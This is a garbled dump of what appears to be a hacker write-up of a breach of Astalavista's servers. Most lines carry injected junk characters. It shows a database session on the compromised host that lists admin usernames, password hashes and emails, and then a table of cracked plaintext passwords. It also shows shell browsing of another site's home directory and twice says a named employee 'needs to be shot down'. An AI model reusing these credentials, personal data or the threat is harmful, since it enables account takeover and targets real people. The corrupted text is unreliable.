<language>en-us</language>- V$ N* U4 @+ [- j
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
- N6 t5 R4 a# A <docs>http://blogs.law.harvard.edu/tech/rss</docs>
0 Y: p9 A: Q# {. V <generator>Astalavista.com</generator>; \$ n) x7 s* N3 y
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘" ~" c t: w, a0 a$ q7 ~
</channel>
$ S* P+ k4 o9 T- |</rss>’;
+ A6 e) h3 j) H3 a, U+ q7 p0 }% C# I% ~" C) ^9 o
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {& h" Y- R7 g2 G) E
unlink (FULLPATH . ‘/feed/exploits.xml’);
* F$ s( |" J, o& z! V3 [ {( z }
( [& l" |7 F! _& W, W5 ]# V$ C, k7 ?8 u) t
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);3 D' j& S1 W/ |; F
[snip]
0 g S# J( R o" ^
: X% s! y- p7 J1 g' Z* j) C% G9 Zsh-3.2$ cat exploits.sh
@/ Z1 C+ P( K#!/bin/sh1 x- P0 U" T6 Z/ ~) R9 ^0 v
$ x7 b. O! H; Y& B###########################################################
4 ^7 J( A4 G2 r. S7 B# #4 t6 R9 n- P5 H- ]- o# q
# Title: milw0rm exploits adder #! X J4 n9 i1 S, k3 e' | }
# Description: Add all milw0rm exploits to the #2 ]6 m V' }% T" B9 W: L+ o ^
# Astalavista.com database #* z8 _% J( u7 |/ `# @5 d( U/ ]* ~
# #$ w/ j! S7 } \ j$ Z, ] _! h: \
# Company: Astalavista Group #
7 B: D% n c: Z# q) l; D# Author: Paulo M. Santos #
2 z' \8 s: l* J# b6 S2 ]# E-Mail: 链接标记paulo.santos@astalavista.ch #' X/ \5 }- b% D: [0 N
# #
# S t* D/ ~* Y, G###########################################################
; q' ? l1 y: ~3 H
: q6 V& n0 C& C# path6 T- S9 j; o) S
this_path=/home/com/public_html/modifications/cronjobs6 o: j" f4 F" A
8 M" k S! j8 R5 P; C5 T# change directory |" g5 J6 M- c$ |0 s- L
cd $this_path7 r. k5 T# S: J+ T3 N4 l& b5 s7 ~
cd tmp/
$ w5 ~) q2 G" }, @' i5 @; A( ^, i2 J$ R0 r7 ? [3 |1 f B
# delete files
: Q4 J. ]/ K! Hrm -rf milw0rm.tar.* &2 F& O, \+ C/ B/ s b$ ?
rm -rf milw0rm/ &
$ a7 z0 { _% }+ `" q3 z5 u5 z4 k$ x% ?
# wget milw0rm paket- U9 Q v. I3 x
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
7 b9 J; K5 L; W& V" a7 B
- y% G5 P9 u, v0 I+ C$ }& L# extract milw0rm paket
% B( i: g/ X( ?# a8 y5 F( d2 ^tar -xvf milw0rm.tar.bz2$ G7 P! U4 L8 [7 v" a6 L, }5 E
7 T; w. H% o* u
# change owner
4 r+ W6 [( C* m+ Kchown -R com .
% ]' v, x7 R3 ^6 f$ I7 E( X# k! m# nchgrp -R com .
0 _- B5 |8 y8 ?7 c) J3 j6 x
u+ [" \& i& z# T/ y+ b; A# execute php script& K% R& F' f9 u. h% M! y. r# O
cd $this_path
0 y, I) c+ X7 }! \ D2 `* ~2 Q% Sphp -q exploits.php
0 g+ X, @2 `* d7 @; c
4 {: a4 `2 r- w2 [0 C# delete files* w" N, X; }! x5 W1 I
rm -rf tmp/milw0rm.tar.*! z% b7 I& l/ Q- ]( T
rm -rf tmp/milw0rm/
1 z) C) L" Q7 E1 i5 ]# |/ O
9 B* N6 {! W0 gsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
' u2 O5 o4 t$ k4 ^( \: ?Paulo M. Santos needs to be shot down.1 W3 l6 X E$ H) T- ?8 x5 S
- z& i" A/ h, G7 S; Y M
mysql -u contrexxuser2 -p7 M H" m/ [$ r. E/ r. s
Enter password:( \1 x6 W) N# ?0 c0 j
Welcome to the MySQL monitor. Commands end with ; or \g.
, X& u6 o4 P/ M7 MYour MySQL connection id is 2616948 ?) d6 k5 i# s2 T& u
Server version: 5.0.45-community-log MySQL Community Edition (GPL)+ F9 d- K) g9 E
; a# q3 F7 X5 r6 DType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.! a# y1 o2 [! h$ w, { U
, o, H. @3 l5 P: M, a# Hmysql> show databases;
. c! c. T5 k. T6 Z. n6 x9 |: i0 G+——————–+5 [" H- _( ~3 n9 f ` a
| Database |2 \3 j' v9 ?7 C8 Y% `, i
+——————–+
+ q1 j$ ^$ o: d# Y: u* n| information_schema | q9 B% t! J& `* P6 _; h" F
| com_contrexx2 |, l# o+ c- E3 u4 Q' n
| com_contrexx2_live |0 e$ S6 z" ]3 I' B/ S: ~
| test |
9 }1 C' f* e' s+ Q3 {+——————–+0 a/ `8 i7 u: ^# U7 M7 m4 ~
4 rows in set (0.00 sec)0 z5 X) d5 v- e$ l
; I' |% Y' u& \6 H, ?8 x4 }6 T
mysql> use com_contrexx2_live1 r5 \: B: |( z, ]2 J6 k2 a
Database changed
2 M( O; q, `8 Nmysql> show tables;8 y/ f9 c3 b7 z+ y; L
+————————————————–+, w: `* B7 B* L1 l; M5 G
| Tables_in_com_contrexx2_live |
7 R; \3 A# Z) h o" @. i+————————————————–+, a C" [) A# y
| cc_banner_counter |$ G+ \2 m. S5 v4 j' c; |5 i
| cc_search_counter |
/ W2 x% E3 B; C+ z| contrexx_access_group_dynamic_ids |/ l0 x3 i$ B7 o9 } z$ Q7 X
| contrexx_access_group_static_ids |0 p$ Q# {3 F, d4 f
| contrexx_access_rel_user_group |
+ k$ f0 O+ L5 D| contrexx_access_settings |& X/ X* q* d- x1 ~
| contrexx_access_user_attribute |
: W7 t/ x, X9 y0 T( c% z( M* A| contrexx_access_user_attribute_name |: `6 N0 c; i7 l, `4 i
| contrexx_access_user_attribute_value |4 V6 J5 j, g5 ~% u! e3 `
| contrexx_access_user_core_attribute |
2 H% r( |- b1 {, z- L| contrexx_access_user_groups |
& k7 X3 ]: p. b/ V% D| contrexx_access_user_mail |; n4 O. }$ F8 K5 H% [+ s7 ?! k
| contrexx_access_user_profile |3 g3 `( v( z0 q
| contrexx_access_user_title |
1 t( h) `3 a0 |; r+ r| contrexx_access_user_validity |
$ b/ W6 i$ P- v| contrexx_access_users |/ C7 M- @# k! m7 M1 I1 C% s4 a7 N
| contrexx_backend_areas |
) ]9 M( \% u* }, C" J4 c/ v# X| contrexx_backups |
- [# b; W. H3 }; [' K| contrexx_content |5 q& [* j6 M' Z" c) {7 x3 N" o6 \
| contrexx_content_history |
9 `/ x) d: B6 e- {) ^: A| contrexx_content_logfile |
0 Y1 E: i+ K5 I2 F0 z| contrexx_content_navigation |" _3 S" S- ^$ c! z- l: G
| contrexx_content_navigation_history |
9 d2 h, z" F$ U| contrexx_ids |
0 S/ h. h- V9 E+ R% d/ K| contrexx_languages |$ f z. ] _/ A$ I- Y; V$ n: D
| contrexx_lib_country |
/ c7 I1 Y9 e9 s! V0 \| contrexx_log |
7 K3 z/ I5 f& T+ K1 y2 ?| contrexx_module_alias_source |+ `3 B2 c7 B4 G3 h4 K
| contrexx_module_alias_target |
3 j6 z) O5 t, C. X| contrexx_module_block_blocks |5 U2 {5 o: }0 J- t% J
| contrexx_module_block_rel_lang |
/ M6 Q% k% Y. X! _| contrexx_module_block_rel_pages |- ?' k1 v; N9 D+ r9 |. Q6 [( L
| contrexx_module_block_settings |6 w$ E k+ I2 _% F
| contrexx_module_blog_categories |# q. ~' |* s/ V) s. s$ H
| contrexx_module_blog_comments |
$ d. |: @* U9 A) Z: A7 f; @| contrexx_module_blog_message_to_category |
. B* q6 ^8 u( [% i9 N% r| contrexx_module_blog_messages |
& g5 `2 B. }. o0 c| contrexx_module_blog_messages_lang |. n! D: l" R% b7 H. X
| contrexx_module_blog_networks |
, o( N% e: M) l! z! O6 R+ o7 r7 r| contrexx_module_blog_networks_lang |
6 z. e. D* w" O. I5 P2 A+ |& _6 D| contrexx_module_blog_settings |6 Z* S# D1 @1 F+ e0 [/ @1 | N8 q3 Z
| contrexx_module_blog_votes |
" J }, r& b$ M0 @2 [! Q7 T) Z3 [| contrexx_module_calendar |
( r6 G4 Z. | l2 ^; g6 [: w| contrexx_module_calendar_access |* ^6 E3 l2 B9 k: R* C" I( l! |
| contrexx_module_calendar_categories |
6 t0 G, P }4 ^! V3 f| contrexx_module_calendar_form_data |" N3 [/ |( ^* f0 n0 E) `1 m3 W
| contrexx_module_calendar_form_fields |
" A" I( X$ N- w/ y" g& L| contrexx_module_calendar_registrations |
% }# d9 V4 D- _5 `| contrexx_module_calendar_settings |+ @' c& \6 E5 A! A/ x/ }9 _3 [
| contrexx_module_calendar_style |7 W" _# f. `* h6 N6 ?
| contrexx_module_contact_form |% H! {% p& e8 B7 E+ X
| contrexx_module_contact_form_data |) j3 Q$ Z% |6 i' l8 H0 }
| contrexx_module_contact_form_field |$ E z/ q2 k7 M2 p/ G
| contrexx_module_contact_settings |
6 R" I6 b6 _& K1 k: e| contrexx_module_data_categories |# i# {. Y6 c2 `# B
| contrexx_module_data_message_to_category |
n9 L. b$ u" I. || contrexx_module_data_messages |! K; q! Y+ S& a
| contrexx_module_data_messages_lang |5 H: D( j3 c* B/ P
| contrexx_module_data_placeholders |' g, @+ W" I" r
| contrexx_module_data_settings |
/ l' i" n7 z& @% _| contrexx_module_directory_access |
& {, O5 R2 o3 C2 G" B% s0 M3 _1 u| contrexx_module_directory_categories |6 l+ i& X0 P) z6 I7 ?; F' ?$ J
| contrexx_module_directory_dir |
+ ]: Y# w4 W% V" |9 a* Y: ~| contrexx_module_directory_inputfields |- k+ v2 U( u5 E* z$ S- d! |
| contrexx_module_directory_levels | O/ C7 P! `( w- p' Z. b
| contrexx_module_directory_mail |3 h- U5 s; D" I. B% g& |
| contrexx_module_directory_rel_dir_cat |* A& j# u! n: U. [
| contrexx_module_directory_rel_dir_level |) z4 F! ]6 A% C4 S
| contrexx_module_directory_settings |( d& r% ^/ A6 g
| contrexx_module_directory_settings_google |" z$ V$ t+ G* P; Q% G5 m, _- o
| contrexx_module_directory_vote |& T& t' g& v8 V" l6 M
| contrexx_module_docsys |4 h! X0 d( K" @2 v0 B! J
| contrexx_module_docsys_categories |5 ~" ^6 t. I0 ` l- z9 l4 C" a
| contrexx_module_egov_configuration |" J* E4 w6 a( m4 P2 l1 k
| contrexx_module_egov_orders |. A/ p6 Z. J! X6 Z' L; `6 D
| contrexx_module_egov_product_calendar |& l0 L7 ?) i* M, ]
| contrexx_module_egov_product_fields |9 ^8 z+ Q/ j2 `$ z/ L
| contrexx_module_egov_products |# X5 W" a: [; ]% p0 _+ h
| contrexx_module_egov_settings |
( ? Z* @# \& Q0 ]1 g. L7 s7 l3 @| contrexx_module_exploits |) o, R/ j# M; m, Y, W" [
| contrexx_module_exploits_categories |
$ X6 U6 o# J% ?9 H$ g1 m9 w4 r9 N, ]# x| contrexx_module_feed_category |! J2 A; w, O+ ]% b: E6 X" a2 V
| contrexx_module_feed_news |4 u/ y* a( l' V3 ^* n" o7 T
| contrexx_module_feed_newsml_association |, [7 R6 M* `; _; O$ j4 l
| contrexx_module_feed_newsml_categories |
7 K M; W4 M$ t& F0 d8 g5 _8 \; _| contrexx_module_feed_newsml_documents |
5 ]3 X" Z4 @/ ^6 f/ \- @| contrexx_module_feed_newsml_providers |
! p4 s& I8 j+ l| contrexx_module_forum_access |
a. V0 [6 y. i% M| contrexx_module_forum_categories |+ C1 ^8 k( y, k. a
| contrexx_module_forum_categories_lang |
1 Z3 g: E# X% |- o; E8 ^7 A| contrexx_module_forum_notification |! q) s" ]+ x5 H) Z6 T
| contrexx_module_forum_postings |6 j1 `5 f2 R9 W
| contrexx_module_forum_rating |
' b1 T: s( w, i+ k1 m9 C) V' |& z. o| contrexx_module_forum_settings |+ @ c4 L/ F7 ~$ e( h( z
| contrexx_module_forum_statistics |0 ]/ a. b4 f2 I s
| contrexx_module_gallery_categories |
5 [$ F: g* I* a1 @1 i; R' _| contrexx_module_gallery_comments |
/ j" ]$ U1 {8 G( l* z9 x4 I7 v| contrexx_module_gallery_language |
* p9 b! w" d9 C# k8 T6 z| contrexx_module_gallery_language_pics |$ l0 L$ V* o& x2 j
| contrexx_module_gallery_pictures |
' r* d8 W% X- |+ h+ k7 F| contrexx_module_gallery_settings |
3 m9 A o' i4 k1 G5 d8 {| contrexx_module_gallery_votes |
7 {& Z# @7 J8 F9 E4 [2 J| contrexx_module_guestbook |% P" H3 F* b7 J6 w% S
| contrexx_module_guestbook_settings |" y# b& z& v, V7 Z. a
| contrexx_module_livecam |
- c, P! Y. x. ]| contrexx_module_livecam_settings |
# I6 u4 v& G7 ]+ @0 B% @' e| contrexx_module_market |
' n4 P' n8 y, r| contrexx_module_market_access |
* J: v0 n% ]3 I5 t; t| contrexx_module_market_categories |
, {7 X+ u6 Q2 |2 ~| contrexx_module_market_mail |
3 ]; A! o7 j1 F6 t: R9 c| contrexx_module_market_paypal |
) Y( h; ~6 n/ G% C% ]| contrexx_module_market_settings |& W; }7 w4 C7 M8 M
| contrexx_module_market_spez_fields |0 p0 v" y1 _( u3 D
| contrexx_module_mediadir_access |; u2 s) B7 `2 q) a
| contrexx_module_mediadir_categories |
$ C) j7 s4 D2 N8 E/ ^8 L8 ~& \# g| contrexx_module_mediadir_comments |( w U D1 {9 g. S
| contrexx_module_mediadir_dir |
! e+ x& f# d" ?9 M% A6 k F% M| contrexx_module_mediadir_inputfields |
7 G' x( f% `$ f/ s0 c| contrexx_module_mediadir_levels |" G6 q- {/ e$ C
| contrexx_module_mediadir_mail |
! Z$ I- m o, J' C| contrexx_module_mediadir_rel_dir_cat |
! f( {# R: Y6 I| contrexx_module_mediadir_rel_dir_level |
- S0 o0 I2 R* P. Q6 x: \| contrexx_module_mediadir_reports |
' i0 E; M' N% @; V; q! I* d| contrexx_module_mediadir_settings |/ W, d' Y/ L8 N5 y- {
| contrexx_module_mediadir_settings_google |- T1 Q4 J6 V3 M4 w: m1 e+ n
| contrexx_module_mediadir_vote |
) a+ M1 B. }6 _% K| contrexx_module_memberdir_directories |
$ j: d5 d- k/ T2 \| contrexx_module_memberdir_name |
* _6 T( O. |' @& f2 ]! N| contrexx_module_memberdir_settings |5 K ]- n6 W4 r) Z3 |$ X7 ]
| contrexx_module_memberdir_values |
4 D7 K7 Q/ d! q+ _$ c( D6 M( e3 O| contrexx_module_nettools_allowed_groups |$ K, P" \, y* B* l8 J
| contrexx_module_nettools_settings |0 Z2 }/ X6 o% N" i2 y0 G5 B U$ }1 q
| contrexx_module_news |
/ O$ t. ~, W# k( f7 U/ N| contrexx_module_news_access |
; d7 z) [0 D. `+ k8 X( Q2 O4 y| contrexx_module_news_categories |( {& w( w, o+ u8 S7 \; w6 _& Q
| contrexx_module_news_settings |
% C+ g/ V; o l| contrexx_module_news_teaser_frame |
$ n; X \2 q9 l$ v| contrexx_module_news_teaser_frame_templates |
4 k5 [) M, T' A: J- a| contrexx_module_news_ticker |6 ~, o+ s; r5 | u5 U
| contrexx_module_newsletter |, |% X- q) S: n
| contrexx_module_newsletter_attachment |
. W7 m' A$ f0 X| contrexx_module_newsletter_category |+ d, J9 {9 @" j
| contrexx_module_newsletter_confirm_mail |
: @* j9 r5 {) f| contrexx_module_newsletter_rel_cat_news |
- t) S9 h8 j2 D* D0 p4 T| contrexx_module_newsletter_rel_user_cat |8 a% ^. @5 _$ k6 M! `
| contrexx_module_newsletter_settings |
1 b# d v" R0 T1 t: l4 R| contrexx_module_newsletter_template |
9 l- y# W$ c' o| contrexx_module_newsletter_tmp_sending |
; W$ T6 S3 f( u& x$ c( s| contrexx_module_newsletter_user |
7 F4 W! v. _9 s, u| contrexx_module_newsletter_user_title |
, }5 b% W$ i, J, f9 i/ j" h) U" p| contrexx_module_onlinetools_defaultports |$ a* C) |1 |+ _6 H- O3 D& E
| contrexx_module_onlinetools_defaultports_back |
) s) a% s J0 g( F5 ~| contrexx_module_onlinetools_geolitecity_blocks |
" D2 O$ j0 ~+ T| contrexx_module_onlinetools_geolitecity_country |, t) b9 |( j& Q- z% E! Z t
| contrexx_module_onlinetools_geolitecity_location |
7 P: ]7 ?* q/ n1 a' X ]| contrexx_module_podcast_category |
. B% Q$ J: n/ X1 |0 |8 f| contrexx_module_podcast_medium |& i( n# h+ N/ T9 M( x! ?
| contrexx_module_podcast_rel_category_lang |
8 Y- |, h% g6 Q2 I( K) t1 ]| contrexx_module_podcast_rel_medium_category |5 J( D" `5 \, V
| contrexx_module_podcast_settings |
! \* z! k# f) T! }9 o5 N9 T| contrexx_module_podcast_template |! w' B; f3 H( E; X2 z& w% i
| contrexx_module_proxydb |
* _6 P% @! { N' J# m7 x. |9 U( S+ _9 X| contrexx_module_recommend |, M0 o4 q# a) _
| contrexx_module_repository |. |& z% N X; l* J; q
| contrexx_module_securitynews_cats |6 }* |2 I! v4 s0 X2 Y1 `
| contrexx_module_securitynews_feeds |8 l) U, W' w5 H4 O. r
| contrexx_module_securitynews_news |
* n" L, R3 W9 X2 ~6 S9 A| contrexx_module_shop_categories |
\4 e2 m" I) r| contrexx_module_shop_config |4 i! }: b9 p: I3 }' r1 [) a% z
| contrexx_module_shop_countries |
; |- d) Z& Y9 I| contrexx_module_shop_currencies |
2 L# r6 q0 X4 x; n| contrexx_module_shop_customers |" w9 C$ }: D/ F, x5 o
| contrexx_module_shop_importimg |; W# S* N1 V0 {3 R- I: t, [) J
| contrexx_module_shop_lsv |
( ~; w, j7 T* n) }& |+ n' A/ u| contrexx_module_shop_mail |
6 L, r1 S# }6 n2 ^9 ?# V% H; || contrexx_module_shop_mail_content |" o8 R6 ^1 Q# n0 q. c
| contrexx_module_shop_manufacturer |
. ]" x5 ]: |# j. }9 l1 u3 E3 K9 q| contrexx_module_shop_order_items |
+ y& |! F$ Q9 \! M, ~0 j* e| contrexx_module_shop_order_items_attributes |% P3 y) a5 J1 ]
| contrexx_module_shop_orders |/ o/ U' Z# | u; |
| contrexx_module_shop_payment |! E- X8 y0 l4 S) ~5 ]6 P
| contrexx_module_shop_payment_processors |) ]/ D j, K0 D, K/ E
| contrexx_module_shop_pricelists |) E1 ]8 n: k2 w A1 o/ { Z4 A
| contrexx_module_shop_products |
$ P" u: U6 y0 K) W- d| contrexx_module_shop_products_attributes | w! T. L- {" L+ n
| contrexx_module_shop_products_attributes_name |$ ?" T9 V7 [( I' p2 q5 J7 P: X
| contrexx_module_shop_products_attributes_value |
" N' w$ C! H9 F/ `0 I9 ^4 ]| contrexx_module_shop_products_downloads |" T3 t/ L+ R/ U
| contrexx_module_shop_rel_countries |
9 c# W* j8 t A# u; c0 L2 E9 ]| contrexx_module_shop_rel_payment |
! T; Z$ f, [9 f+ |, K| contrexx_module_shop_rel_shipment |
; h- K0 `. C/ G8 H' F| contrexx_module_shop_shipment_cost |
2 d: u& U, m- W9 A| contrexx_module_shop_shipper | o5 V2 D1 o! o' V" q$ g7 _* M
| contrexx_module_shop_vat |0 C% m$ M/ F2 `3 [2 W& P Q* x
| contrexx_module_shop_zones |* Z$ D& w& z7 |, k- y8 ~# z
| contrexx_module_u2u_address_list |. C. @3 a; c" ^, n% G2 _6 |+ \3 F) R
| contrexx_module_u2u_message_log |
, z4 p# T( p7 S" _/ d! c- N% N- C| contrexx_module_u2u_sent_messages |3 _" f5 ?2 \+ M% f# S
| contrexx_module_u2u_settings |* s, P# P" v* D* I6 `& A9 h
| contrexx_module_u2u_user_log |
! b! R& w+ [8 D/ i- Q" d| contrexx_modules |
" E i9 c/ v2 t, V8 ?& || contrexx_sessions |
{: }: H# Y: s/ l7 [8 p| contrexx_settings |
8 l# L+ P; |2 ]| contrexx_settings_smtp |
- z! w* L+ I* B, q| contrexx_skins |
! J, S7 |$ [, [1 r; P. e2 N| contrexx_stats_browser |( ~5 }$ _2 c& n
| contrexx_stats_colourdepth |- ` z* U L# T7 |: ~+ J
| contrexx_stats_config |
0 _4 a+ Y2 Y* @' b: {| contrexx_stats_country |( m- f) a& b1 }2 K. ~- ^+ n1 [
| contrexx_stats_hostname |
$ u& W5 h6 {; @& b" H( I8 J# e| contrexx_stats_javascript |
' F! S: K! R, W, V| contrexx_stats_operatingsystem |4 v- z/ z2 G$ r" T7 Z& D
| contrexx_stats_referer |
. b: D% n9 F! t$ f5 `0 F| contrexx_stats_requests |
+ k' F1 T! e& r: m9 t) h| contrexx_stats_requests_summary |
" P- u: E0 ?6 n| contrexx_stats_screenresolution |
! F! k( I* ]* K8 y| contrexx_stats_search |1 X, A9 \- |- }( f1 g# m: c
| contrexx_stats_spiders |
! z6 y" }: z) g: D| contrexx_stats_spiders_summary |1 k& t) F+ j" w' m. ]4 y3 Z a5 `2 W: y
| contrexx_stats_visitors |
' c0 o2 g/ [9 ^4 h* I V4 q| contrexx_stats_visitors_summary |
! L% Y1 F3 K. u r: R| contrexx_voting_additionaldata |0 e% i5 _2 c6 |( g% y
| contrexx_voting_email |
* V' v6 m/ ^; Z| contrexx_voting_rel_email_system |2 F+ i5 u; I" p: X: Z) s
| contrexx_voting_results |
! p @0 R2 F! a5 a| contrexx_voting_system |
' d0 J9 P( d; ?* I) j/ M2 a| foo |* {8 z$ r3 t$ w
+————————————————–+
7 o$ r" p+ T& a9 ~; S2 `- n/ L227 rows in set (0.01 sec)
7 C/ i9 b3 _- n" G: C; P) R$ @+ q
% z8 c! F) _' J5 z$ c) f4 Imysql> select count(*) as skids from contrexx_access_users;
* M# n' b7 q' A! w0 B! q8 V+——-+ @: o r4 c3 g. f* U" G, Z
| skids |
! i: r. r# S% }5 _ I+——-+5 y' n& |$ g# j+ N3 `3 q" ]
| 53699 |
6 n. T: {5 Y" A# c+ W# D$ H+ f+——-++ x: G, S ]9 x: k7 } \
1 row in set (0.00 sec)
5 j$ M. l0 w9 t% h4 a! h
* N0 n) F& O+ V9 w+ k3 E5 P6 ^mysql> describe contrexx_access_users;
2 I) S: A3 W9 ^/ J# u! x+——————+——————————————+——+—–+————–+—————-+
: |2 W, J+ B% O, w| Field | Type | Null | Key | Default | Extra |
" [& l5 F0 ~" }# ]+——————+——————————————+——+—–+————–+—————-+
# W7 `7 O8 g7 r8 I* e$ X| id | int(10) unsigned | NO | PRI | NULL | auto_increment |& x& o. }3 L! e+ @' p- d
| is_admin | tinyint(1) unsigned | NO | | 0 | |
( K5 Q8 |" U* I7 S, c| username | varchar(40) | YES | MUL | NULL | |
9 A7 E! d; ]6 j9 S| password | varchar(32) | YES | | NULL | |
8 s6 Y7 G- C$ V| regdate | int(14) unsigned | NO | | 0 | |
5 U; {! v5 ^8 y0 a3 V* R| expiration | int(14) unsigned | NO | | 0 | |, c/ m; A5 [5 |( D5 w3 T; z* g3 R1 G
| validity | int(10) unsigned | NO | | 0 | |
+ Z2 c% o$ h' W- X| last_auth | int(14) unsigned | NO | | 0 | |
9 H5 W9 t3 S+ F| last_activity | int(14) unsigned | NO | | 0 | |$ H* P5 d( u8 D ^
| email | varchar(255) | YES | | NULL | |' a& f. L" M3 i( @0 y
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
6 X, e/ g0 G* u$ s4 g$ b& z| frontend_lang_id | int(2) unsigned | NO | | 0 | |
6 E' Z9 ?# k9 [6 `6 g| backend_lang_id | int(2) unsigned | NO | | 0 | |0 J8 S7 K' i3 V, @7 G
| active | tinyint(1) | NO | | 0 | |
( M% H* s7 s, r) F5 L| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |+ y$ H+ ^* I! o+ u2 d: c
| restore_key | varchar(32) | NO | | | |+ l1 T: U7 \1 Y/ V* h9 _% M9 ~
| restore_key_time | int(14) unsigned | NO | | 0 | |
, j. A2 J$ O8 W% G* b3 s| u2u_active | enum(’0′,’1′) | NO | | 1 | |
: m# F% G/ P5 {8 r& A! Q+——————+——————————————+——+—–+————–+—————-+; H$ e8 l" s$ k& g
18 rows in set (0.00 sec)
& ^: I8 b' b& g6 {0 I! y+ K, O. ^; c+ N9 B& ~7 o8 j6 Z
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
4 u# i. k( a" D" w& t+ j' ?+————+———————————-+—————————–+
1 Y! T! S H, j8 W1 h% G| username | password | email |
9 V/ E- L, w$ T1 @+ l+————+———————————-+—————————–+) I2 G1 H8 D" Y/ s9 N
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
! p3 A! s4 |0 o1 J| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |" S! T( W" S" R, g2 x( J
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
( Z* V9 ?3 A. p7 I0 c# ]8 l) M| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |! ~2 y* _# r: G( w% J, B$ V2 X8 C2 H5 j
+————+———————————-+—————————–+
# y+ [$ \# y/ F4 rows in set (0.04 sec)' `; a# B% v( U) w! n. m, R
# R! f' n+ D8 W4 }" P9 {# p1 a
mysql> exit;0 ]$ }8 R% ]7 r( K. s- {
Bye" h4 H* G6 O/ H0 c( l4 R
1 W5 E" r9 q- z
[~] There you go, your “team of security and IT professionals” is a joke.3 t. \5 O; E9 G" h# }* c$ d
: l7 i; C: Y1 e6 V \& N
+——————————++ H; l2 Q' Y4 w' Y) Q
system:f82BN3+_*5 @5 \ ^7 V o; t
Be1er0ph0r:belerophor4astacom, J: @' Z: m; O& @; q
prozac:asta4cms!5 J/ G& E! ~& r! Q
commander:mpbdaagf6m
# m& d5 V: O' ~9 q" d- esykadul:ak29eral! o0 y z9 o0 L" F
+——————————+9 N( \/ L) [, B6 Y! }% |: c' c# D* Y: m
. W3 Z5 ` B9 ~2 @% Z0 Y[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
: o& V7 T c8 G+ e# `5 B9 @…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
+ {* k) L5 c2 c X$ f4 ?) G$ z. z% Y' e! E. T: C' h% v
[~] Lets move to astalavista.net now," i: g2 }+ j8 f6 E }8 G
+ D6 @ s) f# x# v$ B% nFrom <链接标记[url]https://www.astalavista.net/[/url]>:
" X$ Q4 K( U( B) B3 W>> Everyone knows that the best defense is a good offense.
" F$ N( g+ Q3 [1 Z/ ?>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
' S* n) J3 q% j>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
( O% `6 C* L& u* p$ I' ^& X>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
8 f+ V5 O5 N" X f c. I r" p; w7 R* |/ @8 v4 v
>> Go ahead, try and hack our server . in a completely legal way!
) v8 q+ j# C( T( M& l>> Learn by doing: We offer our members tricky tasks and challenges on an$ S% g% w5 a- i% j+ b# B
>> ongoing basis so you can test your knowledge and abilities. You can also! l3 |0 z; |3 m
>> demonstrate what you.ve mastered by taking part in regular hacker contests
& p5 h1 D* Y, O) o; l" K/ d0 |5 }>> and war games
' E3 q% j6 Q4 g# [ Q% z7 ?% M
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
5 Y8 X$ w2 P3 r* M2 s8 ~
+ A9 X7 i/ P, J3 o! o8 Q[-] Tricky task: Find home dir of astalavista.net
1 E g" h5 p0 t: @1 Q8 V
5 X, x/ |1 A0 P+ m7 K. Z; z* Gsh-3.2$ ls -la ~astanet
j& ~+ E2 n! O: l6 Htotal 48
1 t( f5 d. c4 B5 E/ A0 y3 Mdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .4 n7 u" P" Q1 X g% E1 A; s
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
0 B. }; ^0 j G( e. W# C$ Ldrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth" _5 Q4 j) r6 F4 k5 U* C% X
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history. t' x2 I4 |/ }' _7 t x
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout( J* o$ b1 {3 `" p6 E6 @/ P
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile' M* c& S8 [7 I1 y+ J" u4 X
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc) b0 s) R& P$ [7 s) i' z- n
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
/ E+ q1 }8 Q i( v" gdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap' J0 i2 t9 F- n
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail- S+ b: I' i* L; ?3 Q D! I
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
2 t3 K9 x" F8 o( w% S: D-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
; _) X% [8 G8 u4 [1 I# \, s+ ]( l
3 y! n% R1 Q/ {8 Qsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
& y; k1 Z* }: W) I* M% w& ysh-3.2$ ls -la# W5 ^ ?! b/ n, a
total 200
; \ N1 @8 U" m3 kdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
" {6 J! A# Y" P4 j+ ^' U, }drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..% C: T1 N9 @8 Q/ o* j3 E
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007( A5 u0 G9 m, } m* k- A
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql0 O( c: G- h% A1 D' P: |3 i
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com7 d9 o6 F) i9 A w
